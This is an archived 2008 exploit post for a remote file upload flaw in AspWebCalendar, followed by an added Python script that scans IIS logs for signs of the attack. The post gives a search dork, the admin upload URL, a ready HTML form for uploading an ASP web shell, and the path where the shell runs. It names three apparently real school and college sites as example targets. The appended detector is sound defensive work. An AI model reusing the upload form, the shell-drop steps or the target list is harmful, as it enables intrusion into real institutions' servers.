Related information
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index
Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities
eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities
Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities

From: Alemin_Krali Krali <alemin_(at)_windowslive.com>
Date: 19.06.2008
Subject: AspWebCalendar 2008 Remote File Upload Vulnerability

Title: AspWebCalendar 2008 Remote File Upload Vulnerability

# Discovered by : Alemin_Krali
# Dork :calendar.asp?eventdetail

http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell
http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address

upload form

<FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='>
<FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR >
<INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR>
<INPUT TYPE='submit' VALUE='pwned'>
</FORM></P>

# ex1:http://bugs.mimnet.northwestern.edu/ConfRoomCal//calendar_admin.asp?action=upload file
ex2:http://calendar.newpal.k12.in.us//calendar_admin.asp?action=uploadfile
ex3:http://macomb.cc.mi.us/calendar//calendar_admin.asp?action=uploadfile

Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed
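
For administrators running this application, the following added example (not part of the original post) scans IIS W3C logs for the two requests the advisory describes: a POST to calendar_admin.asp with action=uploadfileprocess, and any request for a script file under calendar/eventimages/. The log field layout, the sample lines and the list of script extensions are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended format (documentation IP ranges only).
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2008-06-20 10:01:02 GET /path/calendar.asp eventdetail=12 198.51.100.7 200
2008-06-20 10:02:10 POST /path/calendar_admin.asp action=uploadfileprocess&form=&element= 203.0.113.9 200
2008-06-20 10:02:31 GET /path/calendar/eventimages/picnic.jpg - 198.51.100.7 200
2008-06-20 10:02:44 GET /path/Calendar/EventImages/x.asp cmd=1 203.0.113.9 200
2008-06-20 10:05:00 GET /path/calendar/eventimages/y.asp - 192.0.2.44 404
"""

UPLOAD_STEM = re.compile(r"/calendar_admin\.asp$", re.I)
# Extensions assumed to be mapped to a script handler; adjust to the
# handler mappings actually configured on the server.
SCRIPT_IN_UPLOADS = re.compile(
    r"/calendar/eventimages/[^/]*\.(asp|asa|cer|cdx|aspx|ashx)$", re.I)

def scan(log_text):
    """Return (kind, client_ip, uri_stem, status) tuples in log order."""
    fields, uploaders, findings = [], set(), []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]      # column names for the rows below
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        stem, ip = row["cs-uri-stem"], row["c-ip"]
        action = parse_qs(row["cs-uri-query"].lower()).get("action", [""])[0]
        if (row["cs-method"] == "POST" and UPLOAD_STEM.search(stem)
                and action == "uploadfileprocess"):
            uploaders.add(ip)
            findings.append(("upload", ip, stem, row["sc-status"]))
        elif SCRIPT_IN_UPLOADS.search(stem):
            # A script request from an address that uploaded earlier is the
            # stronger signal; any script in an image directory is suspect.
            kind = ("script-after-upload" if ip in uploaders
                    else "script-in-upload-dir")
            findings.append((kind, ip, stem, row["sc-status"]))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```

Every "upload" hit should be checked against who is expected to use the calendar admin page, and any script file found in the eventimages directory reviewed on disk.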